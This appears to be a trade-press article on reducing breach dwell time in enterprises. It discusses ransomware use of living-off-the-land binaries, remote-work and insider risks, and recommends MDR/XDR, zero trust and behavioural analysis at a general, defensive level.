Addressing Typical Sources of Hidden Malicious Activity inside Enterprises

In today’s threat landscape, organizations must discover effective solutions to mitigate cyber risk, which is driving an underground economy with an annual income measured in trillions of dollars. Businesses must improve their ability to detect and stop these threat actors, evicting them from their networks as swiftly as possible, or they risk irreversible reputational and financial harm.

The cybersecurity sector has a problem: global investment is increasing, yet this increase is not correlated with decreased breaches. In 2015, detecting a breach took an average of 206 days, and containing it took even longer. Five years later, the situation had significantly improved, with the global median dwell time falling below 24 days for the first time in 2020.

Threat actors, however, still have 24 days to accomplish their goals. Organizations must become more efficient at catching and evicting them, bringing down their dwell period to hours or minutes rather than days.

Also Read: Detecting Software Supply Chain Anomalies by ‘Shifting Left’ With Analytics

To accomplish this, more attention must be paid to the most typical sources of hidden malicious conduct within businesses.

Targeted threats

Automated attacks based on commodity are still very common. However, many cybercriminal organizations have discovered that investing more in targeted threats and sophisticated tooling pays off. The recent emergence of ransomware gangs like REvil and Ryuk is a great example. They are increasingly relying on ‘living off the land’ binaries (LOLBins), which exploit legitimate Windows programs and processes to avoid detection by anti-malware tools.

Threat actors have another secret tool to acquire that initial foothold – widespread remote working. The pandemic has hampered security efforts while also exposing new security flaws that have been exploited quickly- distracted remote employees who may click on links without thinking or share networks and devices with others who engage in risky conduct.

The adoption of vulnerable remote working infrastructure and team collaboration apps, as well as remote working tools and accounts without robust password protection, adds to the operating issues of security teams.

Malicious insiders enjoy several incentives and opportunities as a result of the financial demands of the pandemic and the challenges faced in managing remote workers. According to the ‘2020 Cost of Insider Threats: Global Report’, such occurrences can cost an organization over US$4 million per year and take an average of 77 days to resolve. Internal and external risks are exacerbated by inefficient off-boarding processes, over-privileged identities and poor password management.

Also Read: Four Ways Technical Debt can Threaten Cybersecurity Posture

A Three-Pronged Approach

IT security teams must have visibility, context, and control to be successful. However, even determining the extent of an organization’s current endpoint and cloud infrastructure, leave alone safeguarding it, can be difficult. Here are a few approaches enterprises can adopt:

• An MDR/XDR Strategy – Address threat detection and response in isolated ways, and companies are likely to overlook something. For full understanding, they need XDR – to connect events from the cloud, network, and endpoint. MDR is also particularly valuable because it effectively outsources all or part of the security operations role to a third-party specialist. They can assist 24/7 threat detection and containment using solutions like XDR, giving the in-house security staff more time and attention to focus on strategic issues.
• Zero Trust – Another best practice that many businesses are adopting is zero trust, which can be summarized as “never trust, always verify.” Device profiling, risk-based multi-factor authentication (MFA), protective monitoring, network segmentation, and other features are among the foundational capabilities.
• Behavioral Analysis – It’s no longer acceptable to rely exclusively on signatures and static rule-based techniques. To adapt to the usage of LOLBins and other covert approaches like lateral movement with stolen credentials, tooling must evolve. It can provide a much-improved technique of threat detection while boosting the effectiveness of incident response operations when it is reinforced with local business context, such as who are the VIP users and which are the key devices.